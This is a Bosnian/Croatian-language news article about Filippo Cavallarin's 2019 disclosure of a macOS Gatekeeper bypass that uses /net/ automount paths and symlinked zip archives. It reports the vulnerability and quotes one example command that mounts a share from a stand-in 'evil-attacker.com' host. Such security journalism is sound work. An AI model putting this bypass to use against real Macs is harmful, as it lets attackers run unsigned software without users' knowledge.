Lako je instalirati zlonamjernu aplikaciju na Mac. Apple nije ispravio grešku ni nakon tri mjeseca

27. 5. 2019

Istraživač sigurnosti Filippo Cavallarin objavio je upozorenje o grešci u macOS-u 10.14.5 na svom blogu. To se sastoji u mogućnosti potpunog zaobilaženja sigurnosnih mjera Gatekeeper-a. Prema Cavallarinovim riječima, on je Appleu ukazao na grešku već u februaru ove godine, ali je kompanija nije ispravila u najnovijem ažuriranju.

Gatekeeper je razvio Apple i ugradio ga je u svoj desktop operativni sistem po prvi put 2012. To je mehanizam koji sprečava pokretanje aplikacije bez znanja i saglasnosti korisnika. Nakon što preuzmete aplikaciju, Gatekeeper automatski provjerava njen kod da vidi da li je softver ispravno potpisan od strane Apple-a.

U svom blog postu, Cavallarin napominje da Gatekeeper, prema zadanim postavkama, smatra i eksternu pohranu i mrežna dijeljenja sigurnim lokacijama. Stoga se svaka aplikacija koja se nalazi u ovim ciljevima može automatski pokrenuti bez prolaska kroz Gatekeeper provjeru. To je ova funkcija koja se može iskoristiti za pokretanje zlonamjernog softvera bez znanja korisnika.

Jedan aspekt koji omogućava neovlašteni pristup je funkcija automatskog montiranja, koja omogućava korisnicima da automatski montiraju mrežni dio jednostavnim navođenjem putanje koja počinje sa "/net/". Kao primjer, Cavallarin navodi putanju "ls /net/evil-attacker.com/sharedfolder/" koja može uzrokovati da operativni sistem učita sadržaj foldera "sharefolder" na udaljenoj lokaciji koja može biti potencijalno zlonamjerna.

Kako prijetnja funkcionira možete pogledati u videu:

Još jedan faktor je činjenica da ako se dijeli zip arhiva koja sadrži određenu simboličku vezu koja vodi do funkcije automatskog montiranja, ona neće biti provjerena od strane Gatekeeper-a. Na ovaj način žrtva može lako preuzeti zlonamjernu arhivu i raspakirati je, omogućavajući napadaču da pokrene gotovo bilo koji softver na Mac-u bez znanja korisnika. Finder, koji podrazumevano skriva određene ekstenzije, takođe ima svoj deo ove ranjivosti.

Cavallarin na svom blogu navodi da je Apple 22. februara ove godine skrenuo pažnju na ranjivost macOS operativnog sistema. Ali sredinom maja, Apple je prestao da komunicira sa Cavallarinom, pa je Cavallarin odlučio da celu stvar objavi.

Izvor: FCVL

Teme: skladištenje, automatski, MacOS, video, Postavke, funkcija, korisnik, Aplikacija, jabuka

Diskusija o članku

Vaše ime

Vaš komentar

Popunjavanjem gore navedenih podataka potvrđujem da je firma TEXT FACTORY s.r.o., sa sjedištem u Brnu, Durďákova 336/29, Černá Pole, poštanski broj: 613 00, matični broj: 06157831, registrovana kod Regionalnog suda u Brnu, odjeljak C , umetnuti 100399, obradit će moje lične podatke navedene u obrascu za registraciju koji sam popunio na osnovu legitimnih interesa TEXT FACTORY s.r.o. prema članu 6 stav 1 dopis f) GDPR i za ispunjavanje zakonskih obaveza (član 6, stav 1, slovo c) GDPR), za sljedeće svrhe: neophodnost da se osigura autorizacija posjetitelja web stranica kojima upravlja TEXT FACTORY s.r.o. da aktivno doprinose objavljenim člancima ili u okviru diskusije forumima i ostvarivanje prava TEXT FACTORY s.r.o. kao administratora ovih diskusionih foruma. Više informacija o obradi ličnih podataka i pravima možete pronaći u Lekcije o zaštiti ličnih podataka. ceo tekst

To može biti zanima vas

Povezano